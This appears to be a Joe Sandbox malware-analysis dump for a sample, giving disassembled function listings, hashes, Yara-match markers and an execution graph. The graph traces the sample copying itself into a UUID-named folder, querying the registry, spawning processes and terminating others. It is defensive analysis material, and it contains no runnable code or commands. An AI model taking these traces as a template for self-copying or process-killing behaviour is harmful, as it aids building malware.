                                                                                                • Opcode Fuzzy Hash: 7aa5c98289f18997e9299cf2a82b2e33c44f00e8491ec962a9d4b764f8744340
                                                                                                • Instruction Fuzzy Hash: 5F411532904305AFEF05AFA4DE41B9E3BF8AF48718F10842DEA1496290DB75BD45DB11

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 746 4a984ab-4a984d9 call 4a98477 751 4a984db-4a984de 746->751 752 4a984f3-4a9850b call 4a9158d 746->752 753 4a984ed 751->753 754 4a984e0-4a984eb call 4a9158d 751->754 759 4a9850d-4a9850f 752->759 760 4a98524-4a9855a call 4a9158d * 3 752->760 753->752 754->751 754->753 762 4a9851e 759->762 763 4a98511-4a9851c call 4a9158d 759->763 771 4a9856b-4a9857e 760->771 772 4a9855c-4a98562 760->772 762->760 763->759 763->762 776 4a9858d-4a98594 771->776 777 4a98580-4a98587 call 4a9158d 771->777 772->771 773 4a98564-4a9856a call 4a9158d 772->773 773->771 780 4a985a3-4a985ae 776->780 781 4a98596-4a9859d call 4a9158d 776->781 777->776 784 4a985cb-4a985cd 780->784 785 4a985b0-4a985bc 780->785 781->780 785->784 787 4a985be-4a985c5 call 4a9158d 785->787 787->784
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000E.00000002.2060401394.0000000004A70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A70000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_14_2_4a70000_E609.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _free$ExitProcess___crt
                                                                                                • String ID:
                                                                                                • API String ID: 1022109855-0
                                                                                                • Opcode ID: 351ddd14b24f1e3a4d385d89d907221036510e379468225c84414e37ce72688f
                                                                                                • Instruction ID: 69fe4ad3d7aa6420a38e8b420b63927dc30ec88610e69628fc55e978541e795c
                                                                                                • Opcode Fuzzy Hash: 351ddd14b24f1e3a4d385d89d907221036510e379468225c84414e37ce72688f
                                                                                                • Instruction Fuzzy Hash: F831C331900651DFEFA1AF14FC8084977E4FB19324B05866EE9055B2B0CBB8BDC9AF94
                                                                                                APIs
                                                                                                • std::exception::exception.LIBCMT ref: 04ABFC1F
                                                                                                  • Part of subcall function 04AA169C: std::exception::_Copy_str.LIBCMT ref: 04AA16B5
                                                                                                • __CxxThrowException@8.LIBCMT ref: 04ABFC34
                                                                                                • std::exception::exception.LIBCMT ref: 04ABFC4D
                                                                                                • __CxxThrowException@8.LIBCMT ref: 04ABFC62
                                                                                                • std::regex_error::regex_error.LIBCPMT ref: 04ABFC74
                                                                                                  • Part of subcall function 04ABF914: std::exception::exception.LIBCMT ref: 04ABF92E
                                                                                                • __CxxThrowException@8.LIBCMT ref: 04ABFC82
                                                                                                • std::exception::exception.LIBCMT ref: 04ABFC9B
                                                                                                • __CxxThrowException@8.LIBCMT ref: 04ABFCB0
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000E.00000002.2060401394.0000000004A70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A70000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_14_2_4a70000_E609.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Exception@8Throwstd::exception::exception$Copy_strstd::exception::_std::regex_error::regex_error
                                                                                                • String ID: leM
                                                                                                • API String ID: 3569886845-2926266777
                                                                                                • Opcode ID: ed214ebb3701571be2f43069d920533da395f334550e3d3fd8b3428f3c6f404b
                                                                                                • Instruction ID: a6541e7984985468b5c9c8927acc405afb5eebed1198dcf639054d5dd17bce75
                                                                                                • Opcode Fuzzy Hash: ed214ebb3701571be2f43069d920533da395f334550e3d3fd8b3428f3c6f404b
                                                                                                • Instruction Fuzzy Hash: 1811F879C0020DBBCF00FFA5D955CEEBBBCAB04348F448566AD2497241EB74B7588B95
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000E.00000002.2060401394.0000000004A70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A70000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_14_2_4a70000_E609.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _free_malloc_wprintf$_sprintf
                                                                                                • String ID:
                                                                                                • API String ID: 3721157643-0
                                                                                                • Opcode ID: 02ca39b803bb7accc6b95a63f2f9baed07ed6e7a95ba34453850edf5138b640f
                                                                                                • Instruction ID: 96d1a6c9cd1a461373d6ac98e24e9035cc3530b8d16006589fbb35c0af7ffe90
                                                                                                • Opcode Fuzzy Hash: 02ca39b803bb7accc6b95a63f2f9baed07ed6e7a95ba34453850edf5138b640f
                                                                                                • Instruction Fuzzy Hash: AB11D2B29005547AFB61B7B55D11EFF7AEC9F45706F0400A9FB88D5180EA186F0593B1
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000E.00000002.2060401394.0000000004A70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A70000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_14_2_4a70000_E609.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Exception@8Throw$_memset$_malloc_sprintf
                                                                                                • String ID:
                                                                                                • API String ID: 65388428-0
                                                                                                • Opcode ID: 76dd775f958ae6873f0575faef2ecf56324248e316e82f6433bbffcf9f7903c6
                                                                                                • Instruction ID: a23c8a9633ad9a53118170533cb9d798ca1eb8f72874e134a3652569f24cfa7a
                                                                                                • Opcode Fuzzy Hash: 76dd775f958ae6873f0575faef2ecf56324248e316e82f6433bbffcf9f7903c6
                                                                                                • Instruction Fuzzy Hash: 97513C71D40209BBEB11EBA5DD85FEFBBB8FB04744F140129F905B6180E7746A058BA5
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000E.00000002.2060401394.0000000004A70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A70000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_14_2_4a70000_E609.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Exception@8Throw$_memset_sprintf
                                                                                                • String ID:
                                                                                                • API String ID: 217217746-0
                                                                                                • Opcode ID: 3deed8c6e3840860115ea43936f1cfce13c92bcc70370307f91e5f5c9cd17acd
                                                                                                • Instruction ID: fddabc6e071a7bfa2f291105f4d05b8ab4102894e4ad2ee4bf6cda9c448f9230
                                                                                                • Opcode Fuzzy Hash: 3deed8c6e3840860115ea43936f1cfce13c92bcc70370307f91e5f5c9cd17acd
                                                                                                • Instruction Fuzzy Hash: E55160B1E40209BEEF11DFA1DD46FEEBBB8EB04704F100029F911B6180E775BA058BA5
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000E.00000002.2060401394.0000000004A70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A70000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_14_2_4a70000_E609.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Exception@8Throw$_memset_sprintf
                                                                                                • String ID:
                                                                                                • API String ID: 217217746-0
                                                                                                • Opcode ID: 16aaa772ddb988d461e4337924cf716956fc1cb963719ed600faa1ffd715582e
                                                                                                • Instruction ID: b61e97f41f53ab174b57a48575313f59950964bd9001a17512506285a439bc02
                                                                                                • Opcode Fuzzy Hash: 16aaa772ddb988d461e4337924cf716956fc1cb963719ed600faa1ffd715582e
                                                                                                • Instruction Fuzzy Hash: 8D513F71E40209AAEF21DFA5DD45FEEBBB8FB08704F140129F915B7180E774AA058BA5
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000E.00000002.2060401394.0000000004A70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A70000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_14_2_4a70000_E609.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: __getenv_helper_nolock$__getptd_noexit__invoke_watson__lock_strlen_strnlen
                                                                                                • String ID:
                                                                                                • API String ID: 3534693527-0
                                                                                                • Opcode ID: 7b5cd30b09028c4688c7add7ba7a2b705b2aa5fc65eb7c357d53e3922a347f5d
                                                                                                • Instruction ID: 3f8a2dd9f992578fdcc827a9e3341f44a963f26fe4a462cb506cca52cfb7da2c
                                                                                                • Opcode Fuzzy Hash: 7b5cd30b09028c4688c7add7ba7a2b705b2aa5fc65eb7c357d53e3922a347f5d
                                                                                                • Instruction Fuzzy Hash: 5631F833A05615AAFF217BA4AD087DE37EC9F05B28F104496E944EB281DB74BC0187E1
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000E.00000002.2060401394.0000000004A70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A70000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_14_2_4a70000_E609.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _memset
                                                                                                • String ID: D
                                                                                                • API String ID: 2102423945-2746444292
                                                                                                • Opcode ID: dedb8dcdcede06716d2048126f6c935cbca30f7ec4e51b62ea2b6cedae773fd8
                                                                                                • Instruction ID: eeefbeb6a24a4c3590dae8c2f2c27c8c132042c61683c70d1464624a2bd6aba6
                                                                                                • Opcode Fuzzy Hash: dedb8dcdcede06716d2048126f6c935cbca30f7ec4e51b62ea2b6cedae773fd8
                                                                                                • Instruction Fuzzy Hash: 59E14C72D00219ABDF24EFA0DD89FEEB7B8FF04704F1440A9E509A6190EB746A45CF54
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000E.00000002.2060401394.0000000004A70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A70000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_14_2_4a70000_E609.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _memset
                                                                                                • String ID: $$$(
                                                                                                • API String ID: 2102423945-3551151888
                                                                                                • Opcode ID: d910fc5c6766dfc0bc4f58c39da0494fd508bff05af182706436a08bc08c5056
                                                                                                • Instruction ID: 36c311968ceada7be7c8e3ce912311af427566ec193815fc75349d01f3d40816
                                                                                                • Opcode Fuzzy Hash: d910fc5c6766dfc0bc4f58c39da0494fd508bff05af182706436a08bc08c5056
                                                                                                • Instruction Fuzzy Hash: 0E91BD71D00218ABEF20DFA0CD59BEEBBF4AF15308F2445A9D405772C1DBB66A48CB65
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000E.00000002.2060401394.0000000004A70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A70000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_14_2_4a70000_E609.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _memset
                                                                                                • String ID: p2Q
                                                                                                • API String ID: 2102423945-1521255505
                                                                                                • Opcode ID: 46ecb9121aab2c4594d1f343841fc1340943ec8095ce101e3444a0aa36bfb78c
                                                                                                • Instruction ID: 1f5c5f4306327a1933c3e33152f7838c6e45dabc98093622072e0188ecfa2413
                                                                                                • Opcode Fuzzy Hash: 46ecb9121aab2c4594d1f343841fc1340943ec8095ce101e3444a0aa36bfb78c
                                                                                                • Instruction Fuzzy Hash: A6F0C968698750A5FB217750BD26B857ED17B31F08F144088E1182A2E1D2F9378CA7EA
                                                                                                APIs
                                                                                                • std::exception::exception.LIBCMT ref: 04ABFBF1
                                                                                                  • Part of subcall function 04AA169C: std::exception::_Copy_str.LIBCMT ref: 04AA16B5
                                                                                                • __CxxThrowException@8.LIBCMT ref: 04ABFC06
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000E.00000002.2060401394.0000000004A70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A70000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_14_2_4a70000_E609.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Copy_strException@8Throwstd::exception::_std::exception::exception
                                                                                                • String ID: TeM$TeM
                                                                                                • API String ID: 3662862379-3870166017
                                                                                                • Opcode ID: 96199cc15ff6b6db5c9edb5d1ae12cb70dd59b1139974201ea7fd9c915f9b6e6
                                                                                                • Instruction ID: d6a25fb5ee6b1324cfff8d1f8f2b4c5e68750c76bea47028b8dcb787bcaec974
                                                                                                • Opcode Fuzzy Hash: 96199cc15ff6b6db5c9edb5d1ae12cb70dd59b1139974201ea7fd9c915f9b6e6
                                                                                                • Instruction Fuzzy Hash: ADD06775C0020CBBDB00EFA5D559CDDBBB8AB04348F448466A91497241EB74A7598B95
                                                                                                APIs
                                                                                                  • Part of subcall function 04A9197D: __wfsopen.LIBCMT ref: 04A91988
                                                                                                • _fgetws.LIBCMT ref: 04A7D15C
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000E.00000002.2060401394.0000000004A70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A70000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_14_2_4a70000_E609.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: __wfsopen_fgetws
                                                                                                • String ID:
                                                                                                • API String ID: 853134316-0
                                                                                                • Opcode ID: fb686944b339c976eacea12c72b2cba8865104c98ae0a1a06473ea49a68c22d9
                                                                                                • Instruction ID: d445af19e220c10dae3a79a98bc2101ccbf2fe063038a4c679f6bdef5a7ba688
                                                                                                • Opcode Fuzzy Hash: fb686944b339c976eacea12c72b2cba8865104c98ae0a1a06473ea49a68c22d9
                                                                                                • Instruction Fuzzy Hash: C791AF72D00219ABEF30DFA4CD84BAEB7F5AF04314F140529E915A7240E77ABA15CBE5
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000E.00000002.2060401394.0000000004A70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A70000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_14_2_4a70000_E609.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _malloc$__except_handler4_fprintf
                                                                                                • String ID:
                                                                                                • API String ID: 1783060780-0
                                                                                                • Opcode ID: bc6d813e7e752583a03017172366884d0a88b051dc04778f03b6bdc3bc976eb1
                                                                                                • Instruction ID: 688ed9f4979b133f935e0671c49c7e583e6d7081887a6b67df1a0a8355986742
                                                                                                • Opcode Fuzzy Hash: bc6d813e7e752583a03017172366884d0a88b051dc04778f03b6bdc3bc976eb1
                                                                                                • Instruction Fuzzy Hash: 3BA190B1C00248EBFF11EFE4CD45BDEBBB5AF14308F140468D40576291E7BA6A58CBA6
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000E.00000002.2060401394.0000000004A70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A70000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_14_2_4a70000_E609.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _memset$__filbuf__getptd_noexit__read_nolock
                                                                                                • String ID:
                                                                                                • API String ID: 2974526305-0
                                                                                                • Opcode ID: 7a4cfea45ad1cabaf48d6d85d658ec87b7d71ccae72904ede4351d6e655b18a3
                                                                                                • Instruction ID: c23904256c0ef6efb82dce14778a2c591a2a69c55fdd75c523017c5977fa6a29
                                                                                                • Opcode Fuzzy Hash: 7a4cfea45ad1cabaf48d6d85d658ec87b7d71ccae72904ede4351d6e655b18a3
                                                                                                • Instruction Fuzzy Hash: E851B176A00306FBDF299F6989807AE77F5AF50324F148BA9E835962D0E770BD50CB40
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000E.00000002.2060401394.0000000004A70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A70000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_14_2_4a70000_E609.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                • String ID:
                                                                                                • API String ID: 3016257755-0
                                                                                                • Opcode ID: e393168896588b0b80739e59f19fb333f0c598a6fe77797445646574719babf5
                                                                                                • Instruction ID: 89f06eb0d55cf17a9ba0b77aee43dd29de53d65c56096b65876616a83212d043
                                                                                                • Opcode Fuzzy Hash: e393168896588b0b80739e59f19fb333f0c598a6fe77797445646574719babf5
                                                                                                • Instruction Fuzzy Hash: A301403240024EFBCF525F84DD11CED3F6ABB19394B488515FA9958432E336E5B2AB81
                                                                                                APIs
                                                                                                • ___BuildCatchObject.LIBCMT ref: 04B37A4B
                                                                                                  • Part of subcall function 04B38140: ___BuildCatchObjectHelper.LIBCMT ref: 04B38172
                                                                                                  • Part of subcall function 04B38140: ___AdjustPointer.LIBCMT ref: 04B38189
                                                                                                • _UnwindNestedFrames.LIBCMT ref: 04B37A62
                                                                                                • ___FrameUnwindToState.LIBCMT ref: 04B37A74
                                                                                                • CallCatchBlock.LIBCMT ref: 04B37A98
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000E.00000002.2060401394.0000000004A70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A70000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_14_2_4a70000_E609.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Catch$BuildObjectUnwind$AdjustBlockCallFrameFramesHelperNestedPointerState
                                                                                                • String ID:
                                                                                                • API String ID: 2901542994-0
                                                                                                • Opcode ID: dd3ac78af2fd1184da527a8de72168518a9c3bdc752cc05c4f080d411e07ec88
                                                                                                • Instruction ID: 8d2b1c2ca7e75d35d46a1bb144ac0d64d936a4040707c8abe11c2f47a6a379a7
                                                                                                • Opcode Fuzzy Hash: dd3ac78af2fd1184da527a8de72168518a9c3bdc752cc05c4f080d411e07ec88
                                                                                                • Instruction Fuzzy Hash: C9011736000109BBDF12AF56CC00EDA3BBAEF48759F148054F91866120D732E962DBA0

                                                                                                Execution Graph

                                                                                                Execution Coverage:5.9%
                                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                                Signature Coverage:4%
                                                                                                Total number of Nodes:1982
                                                                                                Total number of Limit Nodes:40
                                                                                                execution_graph 40583 41bae0 40584 41bba0 40583->40584 40585 41bb13 40583->40585 40588 41bf3d 40584->40588 40589 41bbad 40584->40589 40586 41bb15 40585->40586 40587 41bb54 40585->40587 40590 41bb47 PostQuitMessage 40586->40590 40591 41bb1c 40586->40591 40592 41bb70 40587->40592 40598 41bb75 DefWindowProcW 40587->40598 40596 41bf65 IsWindow 40588->40596 40597 41bf9a DefWindowProcW 40588->40597 40593 41bbb0 DefWindowProcW 40589->40593 40594 41bbd7 40589->40594 40590->40592 40591->40592 40591->40593 40600 41bb2e 40591->40600 40659 420c62 40594->40659 40596->40592 40601 41bf73 DestroyWindow 40596->40601 40600->40592 40622 411cd0 40600->40622 40601->40592 40603 41bc26 40683 41ce80 59 API calls _memmove 40603->40683 40606 41bb3f 40606->40596 40607 41bc3a 40684 420bed 58 API calls 2 library calls 40607->40684 40609 41befb IsWindow 40610 41bf11 40609->40610 40611 41bf28 40609->40611 40610->40611 40612 41bf1a DestroyWindow 40610->40612 40611->40592 40612->40611 40613 41bef7 40613->40609 40613->40611 40614 414690 59 API calls 40620 41bcdc 40614->40620 40620->40609 40620->40613 40620->40614 40621 41be8f CreateThread 40620->40621 40685 40eff0 65 API calls 40620->40685 40686 41c330 40620->40686 40692 41c240 40620->40692 40698 41b8b0 40620->40698 40720 41ce80 59 API calls _memmove 40620->40720 40621->40620 40721 42f7c0 40622->40721 40625 411d20 _memset 40626 411d40 RegQueryValueExW RegCloseKey 40625->40626 40627 411d8f 40626->40627 40723 415c10 40627->40723 40629 411dbf 40630 411dd1 lstrlenA 40629->40630 40631 411e7c 40629->40631 40738 413520 40630->40738 40633 411e94 6 API calls 40631->40633 40634 411e89 40631->40634 40635 411ef5 UuidCreate UuidToStringW 40633->40635 40634->40633 40638 411f36 40635->40638 40636 411e3c PathFileExistsW 40636->40631 40639 411e52 40636->40639 40637 411df1 40637->40636 40638->40638 40640 415c10 59 API calls 40638->40640 40643 411e6a 40639->40643 40741 414690 40639->40741 40641 411f59 RpcStringFreeW PathAppendW CreateDirectoryW 40640->40641 40645 411fce 40641->40645 40647 411f98 40641->40647 40643->40606 40644 415c10 59 API calls 40644->40645 40646 415c10 59 API calls 40645->40646 40648 41201f PathAppendW DeleteFileW CopyFileW RegOpenKeyExW 40646->40648 40647->40644 40649 4121d1 40648->40649 40650 41207c _memset 40648->40650 40649->40643 40651 412095 6 API calls 40650->40651 40652 412115 _memset 40651->40652 40653 412109 40651->40653 40655 412125 SetLastError lstrcpyW lstrcatW lstrcatW CreateProcessW 40652->40655 40764 413260 40653->40764 40656 4121b2 40655->40656 40657 4121aa GetLastError 40655->40657 40658 4121c0 WaitForSingleObject 40656->40658 40657->40649 40658->40649 40658->40658 40660 420cdd 40659->40660 40669 420c6e 40659->40669 40806 42793d DecodePointer 40660->40806 40662 420ce3 40663 425208 __output_l 57 API calls 40662->40663 40666 41bbe9 GetComputerNameW 40663->40666 40665 420ca1 RtlAllocateHeap 40665->40666 40665->40669 40676 413100 40666->40676 40668 420cc9 40803 425208 40668->40803 40669->40665 40669->40668 40670 420c79 40669->40670 40674 420cc7 40669->40674 40802 42793d DecodePointer 40669->40802 40670->40669 40799 427f51 58 API calls 2 library calls 40670->40799 40800 427fae 58 API calls 8 library calls 40670->40800 40801 427b0b GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 40670->40801 40675 425208 __output_l 57 API calls 40674->40675 40675->40666 40677 413121 40676->40677 40678 413133 40676->40678 40679 415c10 59 API calls 40677->40679 40681 415c10 59 API calls 40678->40681 40680 41312c 40679->40680 40680->40603 40682 413159 40681->40682 40682->40603 40683->40607 40684->40620 40685->40620 40828 41d3c0 40686->40828 40689 41c35b 40689->40620 40839 41d340 40692->40839 40695 41c26b 40695->40620 40699 41b8d6 40698->40699 40702 41b8e0 40698->40702 40700 414690 59 API calls 40699->40700 40700->40702 40701 41b916 40704 41b930 40701->40704 40705 414690 59 API calls 40701->40705 40702->40701 40703 414690 59 API calls 40702->40703 40703->40701 40706 414690 59 API calls 40704->40706 40708 41b94a 40704->40708 40705->40704 40706->40708 40707 41b964 40853 41bfd0 40707->40853 40708->40707 40710 414690 59 API calls 40708->40710 40710->40707 40711 41b976 40712 41bfd0 59 API calls 40711->40712 40713 41b988 40712->40713 40714 41bfd0 59 API calls 40713->40714 40715 41b99a 40714->40715 40716 41b9b4 40715->40716 40717 414690 59 API calls 40715->40717 40718 41b9f2 40716->40718 40865 413ff0 40716->40865 40717->40716 40718->40620 40720->40620 40722 411cf2 RegOpenKeyExW 40721->40722 40722->40625 40722->40643 40724 415c66 40723->40724 40725 415c1e 40723->40725 40726 415c76 40724->40726 40727 415cff 40724->40727 40725->40724 40734 415c45 40725->40734 40730 415c88 __expandlocale 40726->40730 40771 416950 40726->40771 40780 44f23e 59 API calls 2 library calls 40727->40780 40730->40629 40736 414690 59 API calls 40734->40736 40737 415c60 40736->40737 40737->40629 40739 414690 59 API calls 40738->40739 40740 413550 40739->40740 40740->40637 40742 4146a9 40741->40742 40743 41478c 40741->40743 40745 4146b6 40742->40745 40746 4146e9 40742->40746 40796 44f26c 59 API calls 3 library calls 40743->40796 40747 414796 40745->40747 40748 4146c2 40745->40748 40749 4147a0 40746->40749 40750 4146f5 40746->40750 40797 44f26c 59 API calls 3 library calls 40747->40797 40795 413340 59 API calls _memmove 40748->40795 40798 44f23e 59 API calls 2 library calls 40749->40798 40754 416950 59 API calls 40750->40754 40762 414707 __expandlocale 40750->40762 40754->40762 40759 4146e0 40759->40643 40762->40643 40765 41326f 40764->40765 40767 41327d 40764->40767 40766 415c10 59 API calls 40765->40766 40768 413278 40766->40768 40767->40767 40769 415c10 59 API calls 40767->40769 40768->40652 40770 41329c 40769->40770 40770->40652 40772 416986 40771->40772 40773 4169d3 40772->40773 40776 416a0d __expandlocale 40772->40776 40781 423b4c 40772->40781 40773->40776 40791 44f1bb 59 API calls 3 library calls 40773->40791 40776->40730 40783 423b54 40781->40783 40782 420c62 _malloc 58 API calls 40782->40783 40783->40782 40784 423b6e 40783->40784 40786 423b72 std::exception::exception 40783->40786 40792 42793d DecodePointer 40783->40792 40784->40773 40793 430eca RaiseException 40786->40793 40788 423b9c 40794 430d91 58 API calls _free 40788->40794 40790 423bae 40790->40773 40792->40783 40793->40788 40794->40790 40795->40759 40796->40747 40797->40749 40799->40670 40800->40670 40802->40669 40807 42501f GetLastError 40803->40807 40805 42520d 40805->40674 40806->40662 40821 432534 40807->40821 40809 425034 40810 425082 SetLastError 40809->40810 40824 428c96 58 API calls 2 library calls 40809->40824 40810->40805 40812 425047 40812->40810 40825 432553 TlsSetValue 40812->40825 40814 42505b 40815 425061 40814->40815 40816 425079 40814->40816 40826 42508e 58 API calls 3 library calls 40815->40826 40827 420bed 58 API calls 2 library calls 40816->40827 40819 425069 GetCurrentThreadId 40819->40810 40820 42507f 40820->40810 40822 432547 40821->40822 40823 43254b TlsGetValue 40821->40823 40822->40809 40823->40809 40824->40812 40825->40814 40826->40819 40827->40820 40832 41ccc0 40828->40832 40831 44f23e 59 API calls 2 library calls 40833 423b4c 59 API calls 40832->40833 40834 41ccca 40833->40834 40837 41c347 40834->40837 40838 44f1bb 59 API calls 3 library calls 40834->40838 40837->40689 40837->40831 40845 41cc50 40839->40845 40842 41c257 40842->40695 40844 44f23e 59 API calls 2 library calls 40842->40844 40846 423b4c 59 API calls 40845->40846 40847 41cc5d 40846->40847 40850 41cc64 40847->40850 40852 44f1bb 59 API calls 3 library calls 40847->40852 40850->40842 40851 41d740 59 API calls 40850->40851 40851->40842 40854 41c001 40853->40854 40859 41c00a 40853->40859 40855 41c083 40854->40855 40856 41c04c 40854->40856 40854->40859 40858 41c09e 40855->40858 40862 41c0e1 40855->40862 40892 41cf30 40856->40892 40860 41cf30 59 API calls 40858->40860 40859->40711 40863 41c0b2 40860->40863 40900 41c540 59 API calls Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception 40862->40900 40863->40859 40896 41d5b0 40863->40896 40866 4140f2 40865->40866 40867 414009 40865->40867 40904 44f26c 59 API calls 3 library calls 40866->40904 40869 414016 40867->40869 40870 41405d 40867->40870 40871 4140fc 40869->40871 40872 414022 40869->40872 40873 414106 40870->40873 40874 414066 40870->40874 40905 44f26c 59 API calls 3 library calls 40871->40905 40876 414044 40872->40876 40877 41402b 40872->40877 40906 44f23e 59 API calls 2 library calls 40873->40906 40888 414078 __expandlocale 40874->40888 40903 416760 59 API calls 2 library calls 40874->40903 40902 412e80 59 API calls _memmove 40876->40902 40901 412e80 59 API calls _memmove 40877->40901 40883 41403b 40883->40718 40886 414054 40886->40718 40888->40718 40893 41cf41 40892->40893 40894 41cf5b 40892->40894 40893->40894 40895 414690 59 API calls 40893->40895 40894->40859 40895->40893 40897 41d5e2 40896->40897 40898 41d63e 40897->40898 40899 414690 59 API calls 40897->40899 40898->40859 40899->40897 40900->40863 40901->40883 40902->40886 40903->40888 40904->40871 40905->40873 40907 419f90 40908 419fa0 __write_nolock 40907->40908 41162 40cf10 40908->41162 40910 419fb0 40911 419fc4 GetCurrentProcess GetLastError SetPriorityClass 40910->40911 40912 419fb4 40910->40912 40914 419fe4 GetLastError 40911->40914 40915 419fe6 40911->40915 41534 4124e0 109 API calls _memset 40912->41534 40914->40915 40917 41d3c0 59 API calls 40915->40917 40916 419fb9 40918 41a00a 40917->40918 40919 41a022 40918->40919 40920 41b669 40918->40920 40924 41d340 59 API calls 40919->40924 41544 44f23e 59 API calls 2 library calls 40920->41544 40922 41b673 41545 44f23e 59 API calls 2 library calls 40922->41545 40926 41a04d 40924->40926 40926->40922 40927 41a065 40926->40927 41176 413a90 40927->41176 40931 41a159 GetCommandLineW CommandLineToArgvW lstrcpyW 40932 41a33d GlobalFree 40931->40932 40947 41a196 40931->40947 40933 41a354 40932->40933 40934 41a45c 40932->40934 41192 412220 40933->41192 40938 412220 76 API calls 40934->40938 40935 41a100 40935->40931 40936 420235 60 API calls _LanguageEnumProc@4 40936->40947 40939 41a359 40938->40939 40941 41a466 40939->40941 41207 40ef50 40939->41207 40940 41a1cc lstrcmpW lstrcmpW 40940->40947 40943 41a24a lstrcpyW lstrcpyW lstrcmpW lstrcmpW 40943->40947 40944 41a48f 40946 41a4ef 40944->40946 41212 413ea0 40944->41212 40949 411cd0 92 API calls 40946->40949 40947->40932 40947->40936 40947->40940 40947->40943 40948 41a361 40947->40948 41535 423c92 59 API calls __woutput_p_l 40948->41535 40950 41a563 40949->40950 40954 414690 59 API calls 40950->40954 40985 41a5db 40950->40985 40952 41a36e lstrcpyW lstrcpyW 40953 41a395 OpenProcess 40952->40953 40955 41a402 40953->40955 40956 41a3a9 WaitForSingleObject CloseHandle 40953->40956 40958 41a5a9 40954->40958 40959 411cd0 92 API calls 40955->40959 40956->40955 40961 41a3cb 40956->40961 40957 41a6f9 41541 411a10 8 API calls 40957->41541 40964 414690 59 API calls 40958->40964 40965 41a40b GetCurrentProcess GetExitCodeProcess TerminateProcess 